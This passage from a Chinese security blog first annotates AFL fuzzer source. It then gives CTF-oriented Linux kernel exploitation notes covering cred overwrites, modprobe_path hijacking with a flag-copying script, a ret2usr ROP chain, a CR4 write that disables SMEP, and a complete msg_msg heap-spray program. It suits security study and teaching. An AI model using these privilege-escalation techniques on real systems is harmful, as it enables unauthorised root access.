queued_paths; }} Splice Stage 这一部分是铰接阶段,用来将几个testcase的不同部分拼接在一起,并在之后通过havoc阶段进行变异 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879 if (use_splicing && splice_cycle++ < SPLICE_CYCLES && queued_paths > 1 && queue_cur->len > 1) { struct queue_entry* target; u32 tid, split_at; u8* new_buf; s32 f_diff, l_diff; /* First of all, if we've modified in_buf for havoc, let's clean that up... */ if (in_buf != orig_in) { ck_free(in_buf); in_buf = orig_in; len = queue_cur->len; } // 首先为了havoc清理in_buf /* Pick a random queue entry and seek to it. Don't splice with yourself. */ do { tid = UR(queued_paths); } while (tid == current_entry); // 选择一个随机queue内实例 splicing_with = tid; target = queue; while (tid >= 100) { target = target->next_100; tid -= 100; } while (tid--) target = target->next; /* Make sure that the target has a reasonable length. */ while (target && (target->len < 2 || target == queue_cur)) { target = target->next; splicing_with++; } // 对长度的检查 if (!target) goto retry_splicing;// 如果直到遍历到最后都没有找到适合长度的,就重试 /* Read the testcase into a new buffer. */ fd = open(target->fname, O_RDONLY); if (fd < 0) PFATAL("Unable to open '%s'", target->fname); new_buf = ck_alloc_nozero(target->len); ck_read(fd, new_buf, target->len, target->fname); close(fd); /* Find a suitable splicing location, somewhere between the first and the last differing byte. Bail out if the difference is just a single byte or so. */ locate_diffs(in_buf, new_buf, MIN(len, target->len), &f_diff, &l_diff); // 找到适合的拼接位置, // 首先找到第一个和最后一个不同的byte之间,并且避免只是单byte的不同 if (f_diff < 0 || l_diff < 2 || f_diff == l_diff) { ck_free(new_buf); goto retry_splicing; } /* Split somewhere between the first and last differing byte. */ // 然后在这个区间随机选择一个位置来进行拼接 split_at = f_diff + UR(l_diff - f_diff); /* Do the thing. 
*/ len = target->len; memcpy(new_buf, in_buf, split_at); in_buf = new_buf; ck_free(out_buf); out_buf = ck_alloc_nozero(len); memcpy(out_buf, in_buf, len); goto havoc_stage; // 最后通过havoc阶段进行变异 } 在之后再一次运行到此时由于不再满足此if判断,于是结束循环 12if (use_splicing && splice_cycle++ < SPLICE_CYCLES && queued_paths > 1 && queue_cur->len > 1) 最终清理资源,并结束fuzz_one的运行 1234567891011121314151617181920212223 ret_val = 0;abandon_entry: splicing_with = -1; /* Update pending_not_fuzzed count if we made it through the calibration cycle and have not seen this entry before. */ if (!stop_soon && !queue_cur->cal_failed && !queue_cur->was_fuzzed) { queue_cur->was_fuzzed = 1; pending_not_fuzzed--; if (queue_cur->favored) pending_favored--; } munmap(orig_in, queue_cur->len); if (in_buf != orig_in) ck_free(in_buf); ck_free(out_buf); ck_free(eff_map); return ret_val; trim_case | 对于testcase的修剪 trim_case以2的幂次位置为单位进行裁剪, 每次修减后通过run_target 运行, 测试结果是否与原来相同。 最后如果发生了修剪,再更新bitmap_score 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125static u8 trim_case(char **argv, struct queue_entry *q, u8 *in_buf){ static u8 tmp[64]; static u8 clean_trace[MAP_SIZE]; u8 needs_write = 0, fault = 0; u32 trim_exec = 0; u32 remove_len; u32 len_p2; /* Although the trimmer will be less useful when variable behavior is detected, it will still work to some extent, so we don't check for this. */ if (q->len < 5) return 0; stage_name = tmp; bytes_trim_in += q->len; /* Select initial chunk len, starting with large steps. */ len_p2 = next_p2(q->len); // 以2的幂次向上取整 remove_len = MAX(len_p2 / TRIM_START_STEPS, TRIM_MIN_BYTES); /* Continue until the number of steps gets too high or the stepover gets too small. */ while (remove_len >= MAX(len_p2 / TRIM_END_STEPS, TRIM_MIN_BYTES)) { u32 remove_pos = remove_len; sprintf(tmp, "trim %s/%s", DI(remove_len), DI(remove_len)); stage_cur = 0; stage_max = q->len / remove_len; while (remove_pos < q->len) { u32 trim_avail = MIN(remove_len, q->len - remove_pos); u32 cksum; write_with_gap(in_buf, q->len, remove_pos, trim_avail); // 将修剪后的输入写入outfile fault = run_target(argv, exec_tmout); // 运行fuzz trim_execs++; if (stop_soon || fault == FAULT_ERROR) goto abort_trimming; /* Note that we don't keep track of crashes or hangs here; maybe TODO? */ cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST); /* If the deletion had no impact on the trace, make it permanent. This isn't perfect for variable-path inputs, but we're just making a best-effort pass, so it's not a big deal if we end up with false negatives every now and then. */ if (cksum == q->exec_cksum) { // 检查运行时bitmap是否与原来相等 u32 move_tail = q->len - remove_pos - trim_avail; q->len -= trim_avail; len_p2 = next_p2(q->len); memmove(in_buf + remove_pos, in_buf + remove_pos + trim_avail, move_tail); // 如果是,则更新testcase的len以及内存中的testcase /* Let's save a clean trace, which will be needed by update_bitmap_score once we're done with the trimming stuff. */ if (!needs_write) { // 如果之前没有设置need_write,设置此标志 needs_write = 1; memcpy(clean_trace, trace_bits, MAP_SIZE); // 保存trace_bits } } else remove_pos += remove_len; /* Since this can be slow, update the screen every now and then. */ if (!(trim_exec++ % stats_update_freq)) show_stats(); stage_cur++; } remove_len >>= 1; } /* If we have made changes to in_buf, we also need to update the on-disk version of the test case. 
*/ if (needs_write) { // 如果发生了修剪,需要同步到磁盘里保存的testcase, 并且更新bitmap_score s32 fd; unlink(q->fname); /* ignore errors */ fd = open(q->fname, O_WRONLY | O_CREAT | O_EXCL, 0600); if (fd < 0) PFATAL("Unable to create '%s'", q->fname); ck_write(fd, in_buf, q->len, q->fname); close(fd); memcpy(trace_bits, clean_trace, MAP_SIZE); update_bitmap_score(q); }abort_trimming: bytes_trim_out += q->len; return fault;} calculate_score | 对于testcase分数的计算 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889static u32 calculate_score(struct queue_entry *q){ u32 avg_exec_us = total_cal_us / total_cal_cycles; u32 avg_bitmap_size = total_bitmap_size / total_bitmap_entries; u32 perf_score = 100; /* Adjust score based on execution speed of this path, compared to the global average. Multiplier ranges from 0.1x to 3x. Fast inputs are less expensive to fuzz, so we're giving them more air time. */ if (q->exec_us * 0.1 > avg_exec_us) perf_score = 10; else if (q->exec_us * 0.25 > avg_exec_us) perf_score = 25; else if (q->exec_us * 0.5 > avg_exec_us) perf_score = 50; else if (q->exec_us * 0.75 > avg_exec_us) perf_score = 75; else if (q->exec_us * 4 < avg_exec_us) perf_score = 300; else if (q->exec_us * 3 < avg_exec_us) perf_score = 200; else if (q->exec_us * 2 < avg_exec_us) perf_score = 150; /* Adjust score based on bitmap size. The working theory is that better coverage translates to better targets. Multiplier from 0.25x to 3x. */ if (q->bitmap_size * 0.3 > avg_bitmap_size) perf_score *= 3; else if (q->bitmap_size * 0.5 > avg_bitmap_size) perf_score *= 2; else if (q->bitmap_size * 0.75 > avg_bitmap_size) perf_score *= 1.5; else if (q->bitmap_size * 3 < avg_bitmap_size) perf_score *= 0.25; else if (q->bitmap_size * 2 < avg_bitmap_size) perf_score *= 0.5; else if (q->bitmap_size * 1.5 < avg_bitmap_size) perf_score *= 0.75; /* Adjust score based on handicap. Handicap is proportional to how late in the game we learned about this path. Latecomers are allowed to run for a bit longer until they catch up with the rest. */ if (q->handicap >= 4) { perf_score *= 4; q->handicap -= 4; } else if (q->handicap) { perf_score *= 2; q->handicap--; } /* Final adjustment based on input depth, under the assumption that fuzzing deeper test cases is more likely to reveal stuff that can't be discovered with traditional fuzzers. */ switch (q->depth) { case 0 ... 3: break; case 4 ... 7: perf_score *= 2; break; case 8 ... 13: perf_score *= 3; break; case 14 ... 25: perf_score *= 4; break; default: perf_score *= 5; } /* Make sure that we don't go over limit. */ if (perf_score > HAVOC_MAX_MULT * 100) perf_score = HAVOC_MAX_MULT * 100; return perf_score;} common_fuzz_stuff | 一个testcase的运行 在fuzz过程中,用来通知fork_server运行一次测试,并且保存有效的种子 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455EXP_ST u8 common_fuzz_stuff(char **argv, u8 *out_buf, u32 len){ u8 fault; if (post_handler) { out_buf = post_handler(out_buf, &len); // 此handler通常是afl_processers if (!out_buf || !len) return 0; } write_to_testcase(out_buf, len); // 保存此testcase fault = run_target(argv, exec_tmout); // 运行一次测试 // 返回1说明需要快速终止 if (stop_soon) return 1; if (fault == FAULT_TMOUT) { if (subseq_tmouts++ > TMOUT_LIMIT) { cur_skipped_paths++; return 1; } } else subseq_tmouts = 0; /* Users can hit us with SIGUSR1 to request the current input to be abandoned. 
*/ if (skip_requested) { skip_requested = 0; cur_skipped_paths++; return 1; } /* This handles FAULT_ERROR for us: */ queued_discovered += save_if_interesting(argv, out_buf, len, fault); // 如果存在interesting 的种子,保存起来 if (!(stage_cur % stats_update_freq) || stage_cur + 1 == stage_max) show_stats(); return 0;}","categories":[{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/categories/Fuzz/"}],"tags":[{"name":"Fuzz","slug":"Fuzz","permalink":"https://v3rdant.cn/tags/Fuzz/"},{"name":"Coding","slug":"Coding","permalink":"https://v3rdant.cn/tags/Coding/"}]},{"title":"Pwn.Linux-Kernel-Pwn-All-in-One","slug":"Pwn.Linux-Kernel-Pwn-All-in-One","date":"2024-01-11T08:10:33.000Z","updated":"2024-03-05T01:58:38.032Z","comments":true,"path":"Pwn.Linux-Kernel-Pwn-All-in-One/","link":"","permalink":"https://v3rdant.cn/Pwn.Linux-Kernel-Pwn-All-in-One/","excerpt":"","text":"overview 笔者厌倦了用户态堆的种种tricks,于是决定进入kernel pwn的大坑😊 安全机制 CONFIG_CFI_CLANG 控制流完整性校验,限制ROP CONFIG_SLAB_FREELIST_HARDENED 类似于用户态下 glibc 中的 safe-linking 机制,在内核中的 slab/slub 分配器当中也存在着类似的机制保护着 freelist—— SLAB_FREELIST_HARDENED: 类似于 glibc 2.32 版本引入的保护,在开启这种保护之前,slub 中的 free object 的 next 指针直接存放着 next free object 的地址,攻击者可以通过读取 freelist 泄露出内核线性映射区的地址,在开启了该保护之后 free object 的 next 指针存放的是由以下三个值进行异或操作后的值: 当前 free object 的地址 下一个 free object 的地址 由 kmem_cache 指定的一个 random 值 CONFIG_HARDENED_USERCOPY hardened usercopy 是用以在用户空间与内核空间之间拷贝数据时进行越界检查的一种防护机制,主要检查拷贝过程中对内核空间中数据的读写是否会越界: 读取的数据长度是否超出源 object 范围 写入的数据长度是否超出目的 object 范围 不过这种保护 不适用于内核空间内的数据拷贝 ,这也是目前主流的绕过手段 这一保护被用于 copy_to_user() 与 copy_from_user() 等数据交换 API 中 CONFIG_SLAB_FREELIST_RANDOM 这种保护主要发生在 slub allocator 向 buddy system 申请到页框之后的处理过程中,对于未开启这种保护的一张完整的 slub,其上的 object 的连接顺序是线性连续的,但在开启了这种保护之后其上的 object 之间的连接顺序是随机的,这让攻击者无法直接预测下一个分配的 object 的地址 需要注意的是这种保护发生在slub allocator 刚从 buddy system 拿到新 slub 的时候,运行时 freelist 的构成仍遵循 LIFO CONFIG_INIT_ON_ALLOC_DEFAULT_ON 当编译内核时开启了这个选项时,在内核进行“堆内存”分配时(包括 buddy system 和 slab allocator),会将被分配的内存上的内容进行清零,从而防止了利用未初始化内存进行数据泄露的情况 CONFIG_RANDOMIZE_KSTACK_OFFSET 决定内核栈是否存在随机偏移 CONFIG_MEMCG_KMEM 决定GFP_KERNEL 与 GFP_KERNEL_ACCOUNT 是否会从同样的 kmalloc-xx 中进行分配 CONFIG_CFI_CLANG 决定是否开启CFI(控制流完整性), 限制了ROP CONFIG_STATIC_USERMODEHELPER 决定modprobe_path 是否可写 信息搜集 查看内核版本 1cat /proc/version 检查各种基础保护 启动脚本 pti=on smep,smap kaslr .config 检查分配方式 Target 以下部分来自 ctf-wiki, 笔者会添加一些自己的理解。 modify cred 内核pwn的大部分目标都是实现提权,而一个进程的权限是由其对应的cred结构体决定的,因此。 kernel通过task_struct 中的cred的指针来索引cred结构体, 更进一步地,通过cred的结构体来识别当前user,因此可以通过修改当前cred结构体或者task_struct的指针来达成提权的效果。 12345678910111213141516171819struct cred { atomic_t usage;#ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; /* number of processes subscribed */ void *put_addr; unsigned magic;#define CRED_MAGIC 0x43736564#define CRED_MAGIC_DEAD 0x44656144#endif kuid_t uid; /* real UID of the task */ kgid_t gid; /* real GID of the task */ kuid_t suid; /* saved UID of the task */ kgid_t sgid; /* saved GID of the task */ kuid_t euid; /* effective UID of the task */ kgid_t egid; /* effective GID of the task */ kuid_t fsuid; /* UID for VFS ops */ kgid_t fsgid; /* GID for VFS ops */ ...} 直接定位cred 当拥有内存读写的能力后,可以通过在内存中搜索magic 来查找cred结构体。 // 笔者尝试搜索后,发现不知道为什么,有些cred结构体,magic字段为空 #TODO 笔者给出另一个cred定位方法,在内核态下, GS 段 存储着进程相关控制信息,在其固定偏移,可以找到当前cred结构体的指针。 当然,显然大部分情况,是基本不可能找到恰好访问gs目标偏移地址的gadget的,因此这个方法并不是非常实用。 commit_creds commit_creds() 函数被用以将一个新的 cred 设为当前进程 task_struct 的 real_cred 与 cred 字段,因此若是我们能够劫持内核执行流调用该函数并传入一个具有 root 权限的 cred,则能直接完成对当前进程的提权工作 // 笔者目前还没有看过commit_creds()的源代码,并不清楚对cred有哪些检查 // 在笔者看来,如果没有限制 传入的creds必须是相应 slab_account 的话,其实可以自己找一块内存区域来写 prepare_kernel_cred() 
在内核当中提供了 prepare_kernel_cred() 函数用以拷贝指定进程的 cred 结构体,当我们传入的参数为 NULL 时,该函数会拷贝 init_cred 并返回一个有着 root 权限的 cred: 123456789101112131415struct cred *prepare_kernel_cred(struct task_struct *daemon){ const struct cred *old; struct cred *new; new = kmem_cache_alloc(cred_jar, GFP_KERNEL); if (!new) return NULL; kdebug("prepare_kernel_cred() alloc %p", new); if (daemon) old = get_task_cred(daemon); else old = get_cred(&init_cred); 我们不难想到的是若是我们可以在内核空间中调用 commit_creds(prepare_kernel_cred(NULL)),则也能直接完成提权的工作 不过自从内核版本 6.2 起,prepare_kernel_cred(NULL) 将不再拷贝 init_cred,而是将其视为一个运行时错误并返回 NULL,这使得这种提权方法无法再应用于 6.2 及更高版本的内核 init_cred 在内核初始化过程当中会以 root 权限启动 init 进程,其 cred 结构体为静态定义的 init_cred,由此不难想到的是我们可以通过 commit_creds(&init_cred) 来完成提权的工作 // 一个问题是,在高版本,init_cred本身不再作为一个符号导出,因此你直接 // kallsyms-finder 是找不到相应地址的 // 一个直接的方法是,在相应版本linux源代码里面直接搜索符号引用 // 可以在内核代码段里面找到相应地址 // 这个方法不仅仅可以用于init_cred,一切内核data段的匿名结构体都可以通过这个方法查找, 除非内核在写的时候本身就没有直接访问 modprobe_path modprobe 是linux的一个用于执行不确定格式文件的一个机制,其会以root权限使用modprobe_path指向的解释器来实现相对应的程序,如果我们能够劫持相关的程序,就能以root权限执行一个程序,从而提权 获取 modprobe_path 的地址。 修改 modprobe_path 为指定的程序。 触发执行 call_modprobe,从而实现提权 。这里我们可以利用以下几种方式来触发 执行一个非法的可执行文件。非法的可执行文件需要满足相应的要求(参考 call_usermodehelper 部分的介绍)。 使用未知协议来触发。 12345678910111213// step 1. modify modprobe_path to the target value// step 2. create related filesystem("echo -ne '#!/bin/sh\\n/bin/cp /flag /home/pwn/flag\\n/bin/chmod 777 /home/pwn/flag\\ncat flag' > /home/pwn/catflag.sh");system("chmod +x /home/pwn/catflag.sh");// step 3. trigger it using unknown executablesystem("echo -ne '\\\\xff\\\\xff\\\\xff\\\\xff' > /home/pwn/dummy");system("chmod +x /home/pwn/dummy");system("/home/pwn/dummy");// step 3. trigger it using unknown protocolsocket(AF_INET,SOCK_STREAM,132); 在这个过程中,我们着重关注下如何定位 modprobe_path。 直接定位 由于 modprobe_path 的取值是确定的,所以我们可以直接扫描内存,寻找对应的字符串。这需要我们具有扫描内存的能力。 间接定位 考虑到 modprobe_path 相对于内核基地址的偏移是固定的,我们可以先获取到内核的基地址,然后根据相对偏移来得到 modprobe_path 的地址。 poweroff_cmd 类似于modprobe_path 修改 poweroff_cmd 为指定的程序。 劫持控制流执行 __orderly_poweroff。 关于如何定位 poweroff_cmd,我们可以采用类似于定位 modprobe_path 的方法。 一些宏 以下列出了常用的一些宏 123456789101112131415161718192021222324252627282930313233343536#define ___GFP_DMA 0x01u#define ___GFP_HIGHMEM 0x02u#define ___GFP_DMA32 0x04u#define ___GFP_MOVABLE 0x08u#define ___GFP_RECLAIMABLE 0x10u#define ___GFP_HIGH 0x20u#define ___GFP_IO 0x40u#define ___GFP_FS 0x80u#define ___GFP_ZERO 0x100u/* 0x200u unused */#define ___GFP_DIRECT_RECLAIM 0x400u#define ___GFP_KSWAPD_RECLAIM 0x800u#define ___GFP_WRITE 0x1000u#define ___GFP_NOWARN 0x2000u#define ___GFP_RETRY_MAYFAIL 0x4000u#define ___GFP_NOFAIL 0x8000u#define ___GFP_NORETRY 0x10000u#define ___GFP_MEMALLOC 0x20000u#define ___GFP_COMP 0x40000u#define ___GFP_NOMEMALLOC 0x80000u#define ___GFP_HARDWALL 0x100000u#define ___GFP_THISNODE 0x200000u#define ___GFP_ACCOUNT 0x400000u#define ___GFP_ZEROTAGS 0x800000u#ifdef CONFIG_KASAN_HW_TAGS#define ___GFP_SKIP_ZERO 0x1000000u#define ___GFP_SKIP_KASAN 0x2000000u#else#define ___GFP_SKIP_ZERO 0#define ___GFP_SKIP_KASAN 0#endif#ifdef CONFIG_LOCKDEP#define ___GFP_NOLOCKDEP 0x4000000u#else#define ___GFP_NOLOCKDEP 0#endif 123456#define __GFP_DMA ((__force gfp_t)___GFP_DMA)#define __GFP_HIGHMEM ((__force gfp_t)___GFP_HIGHMEM)#define __GFP_DMA32 ((__force gfp_t)___GFP_DMA32)#define __GFP_MOVABLE ((__force gfp_t)___GFP_MOVABLE) /* ZONE_MOVABLE allowed */#define GFP_ZONEMASK (__GFP_DMA|__GFP_HIGHMEM|__GFP_DMA32|__GFP_MOVABLE) 12345#define __GFP_RECLAIMABLE ((__force gfp_t)___GFP_RECLAIMABLE)#define __GFP_WRITE ((__force gfp_t)___GFP_WRITE)#define __GFP_HARDWALL ((__force 
gfp_t)___GFP_HARDWALL)#define __GFP_THISNODE ((__force gfp_t)___GFP_THISNODE)#define __GFP_ACCOUNT ((__force gfp_t)___GFP_ACCOUNT) 123#define __GFP_HIGH ((__force gfp_t)___GFP_HIGH)#define __GFP_MEMALLOC ((__force gfp_t)___GFP_MEMALLOC)#define __GFP_NOMEMALLOC ((__force gfp_t)___GFP_NOMEMALLOC) 12345678#define __GFP_IO ((__force gfp_t)___GFP_IO)#define __GFP_FS ((__force gfp_t)___GFP_FS)#define __GFP_DIRECT_RECLAIM ((__force gfp_t)___GFP_DIRECT_RECLAIM) /* Caller can reclaim */#define __GFP_KSWAPD_RECLAIM ((__force gfp_t)___GFP_KSWAPD_RECLAIM) /* kswapd can wake */#define __GFP_RECLAIM ((__force gfp_t)(___GFP_DIRECT_RECLAIM|___GFP_KSWAPD_RECLAIM))#define __GFP_RETRY_MAYFAIL ((__force gfp_t)___GFP_RETRY_MAYFAIL)#define __GFP_NOFAIL ((__force gfp_t)___GFP_NOFAIL)#define __GFP_NORETRY ((__force gfp_t)___GFP_NORETRY) 1234567891011121314151617181920212223242526272829#define __GFP_NOWARN ((__force gfp_t)___GFP_NOWARN)#define __GFP_COMP ((__force gfp_t)___GFP_COMP)#define __GFP_ZERO ((__force gfp_t)___GFP_ZERO)#define __GFP_ZEROTAGS ((__force gfp_t)___GFP_ZEROTAGS)#define __GFP_SKIP_ZERO ((__force gfp_t)___GFP_SKIP_ZERO)#define __GFP_SKIP_KASAN ((__force gfp_t)___GFP_SKIP_KASAN)/* Disable lockdep for GFP context tracking */#define __GFP_NOLOCKDEP ((__force gfp_t)___GFP_NOLOCKDEP)/* Room for N __GFP_FOO bits */#define __GFP_BITS_SHIFT (26 + IS_ENABLED(CONFIG_LOCKDEP))#define __GFP_BITS_MASK ((__force gfp_t)((1 << __GFP_BITS_SHIFT) - 1))#define GFP_ATOMIC (__GFP_HIGH | __GFP_KSWAPD_RECLAIM)#define GFP_KERNEL (__GFP_RECLAIM | __GFP_IO | __GFP_FS)#define GFP_KERNEL_ACCOUNT (GFP_KERNEL | __GFP_ACCOUNT)#define GFP_NOWAIT (__GFP_KSWAPD_RECLAIM)#define GFP_NOIO (__GFP_RECLAIM)#define GFP_NOFS (__GFP_RECLAIM | __GFP_IO)#define GFP_USER (__GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_HARDWALL)#define GFP_DMA __GFP_DMA#define GFP_DMA32 __GFP_DMA32#define GFP_HIGHUSER (GFP_USER | __GFP_HIGHMEM)#define GFP_HIGHUSER_MOVABLE (GFP_HIGHUSER | __GFP_MOVABLE | __GFP_SKIP_KASAN)#define GFP_TRANSHUGE_LIGHT ((GFP_HIGHUSER_MOVABLE | __GFP_COMP | \\ __GFP_NOMEMALLOC | __GFP_NOWARN) & \\ ~__GFP_RECLAIM)#define GFP_TRANSHUGE (GFP_TRANSHUGE_LIGHT | __GFP_DIRECT_RECLAIM) 此部分来自 https://elixir.bootlin.com/linux/v6.7.8/source/include/linux/gfp_types.h 如果需要快速知道对应的宏的值,可以直接用C 来 printf 如GFP_KERNEL: 0x6000C0 攻击方法 ROP ret2usr pt_regs sycrop ret2dir heap heap spray heap overflow double free Cross cache overflow page level heap fenshui Race Condition USMA 基于idt的内存搜索 ROP ret2usr 由于KPTI的出现,ret2usr实际上已经不可用了,这里介绍一下ret2usr仅仅是为了拓展了解。 简单来说,ret2usr的核心就是利用内核的ring 0权限,执行用户空间的代码来实现提权。 一个典型的ret2usr rop链: 123456789rop_chain[i++] = (size_t)getRootPrivilige; rop_chain[i++] = SWAPGS_POPFQ_RET + offset; rop_chain[i++] = 0; rop_chain[i++] = IRETQ + offset; rop_chain[i++] = (size_t)getRootShell; rop_chain[i++] = user_cs; rop_chain[i++] = user_rflags; rop_chain[i++] = user_sp; rop_chain[i++] = user_ss; 这里的getRootPrivilige就是用户态的 提权代码。 绕过SMAP与SMEP SMAP和SMEP是 x64 限制内核和用户空间的数据访问的一个架构功能,通过CR4寄存器的低位来判断是否开启。 开启后 从内核态访问用户态的数据会直接panic,因此通过在ROP链中插入 修改 cr4 寄存器的gadget即可绕过 gdb 无法查看 cr4 寄存器的值,可以通过 kernel crash 时的信息查看。为了关闭 smep 保护,常用一个固定值 0x6f0,即 mov cr4, 0x6f0。 KPTI如何限制ret2usr 最后讨论一下KPTI的实现 When PTI is enabled, the kernel manages two sets of page tables. The first set is very similar to the single set which is present in kernels without PTI. This includes a complete mapping of userspace that the kernel can use for things like copy_to_user(). Although complete, the user portion of the kernel page tables is crippled by setting the NX bit in the top level. 
This ensures that any missed kernel->user CR3 switch will immediately crash userspace upon executing its first instruction. The userspace page tables map only the kernel data needed to enter and exit the kernel. This data is entirely contained in the ‘struct cpu_entry_area’ structure which is placed in the fixmap which gives each CPU’s copy of the area a compile-time-fixed virtual address. For new userspace mappings, the kernel makes the entries in its page tables like normal. The only difference is when the kernel makes entries in the top (PGD) level. In addition to setting the entry in the main kernel PGD, a copy of the entry is made in the userspace page tables’ PGD. This sharing at the PGD level also inherently shares all the lower layers of the page tables. This leaves a single, shared set of userspace page tables to manage. One PTE to lock, one set of accessed bits, dirty bits, etc… KPTI维护两套页表,一套和没有开启KPTI 时的页表类似,拥有用户态和内核态的完整映射,这是给内核态使用的,不同的是, 此页表对于用户态内存空间的映射,是没有可执行权限的,这里权限的限制是通过页表的权限位来实现的,因此ret2usr如果关闭了smap和smep,尽管可以访问到用户态数据,但是无法执行用户态代码; 此外,供给用户态的页表,拥有用户态的完整映射和内核的部分映射,这部分映射仅包含进入和离开内核态的代码。 pt_regs 与 KROP 在5.xx版本(笔者还没有检查具体是哪些版本),或者高版本没有开启如下选项时: 1CONFIG_RANDOMIZE_KSTACK_OFFSET pt_regs是进入内核态时,压入栈中的结构 12345678910111213141516171819202122232425262728293031323334struct pt_regs { /* * C ABI says these regs are callee-preserved. They aren't saved on kernel entry * unless syscall needs a complete, fully filled "struct pt_regs". */ unsigned long r15; unsigned long r14; unsigned long r13; unsigned long r12; unsigned long rbp; unsigned long rbx; /* These regs are callee-clobbered. Always saved on kernel entry. */ unsigned long r11; unsigned long r10; unsigned long r9; unsigned long r8; unsigned long rax; unsigned long rcx; unsigned long rdx; unsigned long rsi; unsigned long rdi; /* * On syscall entry, this is syscall#. On CPU exception, this is error code. 
* On hw interrupt, it's IRQ number: */ unsigned long orig_rax; /* Return frame for iretq */ unsigned long rip; unsigned long cs; unsigned long eflags; unsigned long rsp; unsigned long ss; /* top of stack page */ }; 我们注意到,这些内容,由用户态的寄存器决定,可以由我们控制。 因此这些部分可以用于布置ROP链, 当劫持到内核某个结构体的函数指针时,只需要寻找到一条形如 “add rsp, val ; ret” 的 gadget 便能够完成 ROP 具体而言,当通过syscall触发进入内核态前,我们通过在用户态控制所有寄存器,之后,触发syscall时,在syscall_entry 会将用户态的所有寄存器压入栈中来保存运行状态,这时,如果我们能劫持控制流,并通过类似 add rsp, val ; ret 的gadget来迁移栈,在我们可以控制的pt_regs上进行ROP 然而,在之后的内核版本中,加入了 CONFIG_RANDOMIZE_KSTACK_OFFSET , 使得在进入内核时,会产生一个随机栈偏移,使得此利用的稳定性下降。 ret2dir 内核堆区 direct_mapping_arean 存在对于整个物理内存的映射,因此,通过mmap在用户态喷射的匿名页面,实际上也从此分配。 通过mmap大量分配,可以获取到 kernel 上一块近乎连续的物理内存,因此,通过不断堆喷布置gadget滑块,然后随机选择一个内核基地址进行栈迁移,最终就有很大概率命中我们写入的页面。 sycrop 通过下硬件断点在用户态触发的方式,可以将寄存器内容推送到与 per_cpu_entry_area 固定偏移的DB stack上,而在linux 6.2之前, per_cpu_entry_area 没有加入随机化,地址固定,所以可以达到在内核固定地址造ROP链的手段 work_for_cpu_fn 这实际上是一个tricks,在内核很难ROP时,可以利用 12345678static void work_for_cpu_fn(struct work_struct *work){ struct work_for_cpu *wfc = container_of(work, struct work_for_cpu, work); wfc->ret = wfc->fn(wfc->arg);} 在劫持rsi的情况。 这个函数可以实现执行一次函数调用,并将返回值保存 overview 注意到,上述列出的几个攻击方法,实际上核心问题就是ROP链写在哪些地方。 pt_regs: 写在内核栈上 ret2dir: 写在direct mapping arena sycrop: 写在加入随机化的区域 由于ROP可以很方便劫持控制流,所以使用ROP攻击内核时,一般使用 commit_cred 进行提权 遗憾的是,在高版本内核,由于CFI的引入,很多时候难以找到完善的gadget进行利用,限制了ROP的使用 heap UAF 有效大小Obj的UAF和良好的kmalloc flag 这里主要指和内核关键结构体存在同样的分配size和flag的UAF, 如 tty_operations 或 seq_operations 等等。 利用这些结构的UAF可以直接leak 内核数据或者劫持控制流,这个攻击流程就不赘述了。 任意大小的UAF 接下来讲述一下任意大小UAF(也没有那么任意)的利用 CVE-2021-22555: 基于msg_msg的堆喷 | GFP_KERNEL_ACCOUNT 基于add_key的堆喷 UASM 见后文UASM的利用 cross cache UAF #TODO heap overflow 基础overflow 同上文,存在特定结构体的Overflow, 因此可以非常方便地控制一个有效结构,此时的利用非常简单。 cross_cache overflow | 打破slab隔离 众所周知,slab之间存在隔离,因此,如果溢出点在一个特定size的slab,此时,就无法通过直接的溢出劫持控制流。 但是,还是存在在buddy system溢出的办法。 考虑到堆喷耗尽buddy system的低位单页内存,那么之后从slab分配就会从高位连续的页面中切分,此时,就可以使得分配的页面来自一块近乎物理连续的内存,此时,如果在某个页面末尾的slab溢出,那么就可以溢出到下一个页面。 如果下一个页面,被另一个cache申请用来分配另外一种slab,此时就可以实现跨cache的溢出,从而控制有意义的cache. 
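Both the msg_msg spray mentioned above and the buddy-exhaustion step of the cross-cache technique come down to the same primitive: allocating a large number of kernel objects of a chosen size from user space. Below is a minimal sketch of such a spray using System V message queues; it assumes a 48-byte struct msg_msg header on x86-64 (so a payload of N-48 bytes lands in kmalloc-N) and spreads the messages over many queues to stay under the per-queue msgmnb byte limit. Sizes and counts are illustrative, not taken from the original post.

```c
#include <stdio.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define TARGET_CACHE   1024          /* kmalloc-1024 as an example target */
#define MSG_HDR        48            /* sizeof(struct msg_msg) on x86-64 */
#define NUM_QUEUES     256
#define MSGS_PER_QUEUE 8             /* keep each queue under msgmnb (16 KiB default) */

struct spray_msg {
    long mtype;
    char mtext[TARGET_CACHE - MSG_HDR];
};

int main(void)
{
    struct spray_msg msg = { .mtype = 1 };
    int q, i, sprayed = 0;

    memset(msg.mtext, 'A', sizeof(msg.mtext));

    for (q = 0; q < NUM_QUEUES; q++) {
        int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
        if (qid < 0) { perror("msgget"); break; }

        /* every successful msgsnd() allocates one msg_msg in the target cache */
        for (i = 0; i < MSGS_PER_QUEUE; i++) {
            if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) < 0) { perror("msgsnd"); break; }
            sprayed++;
        }
    }
    printf("sprayed %d msg_msg objects\n", sprayed);
    return 0;
}
```

Freeing part of the spray afterwards (msgrcv or removing the queues) is what punches the holes that the victim object is then allocated into.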
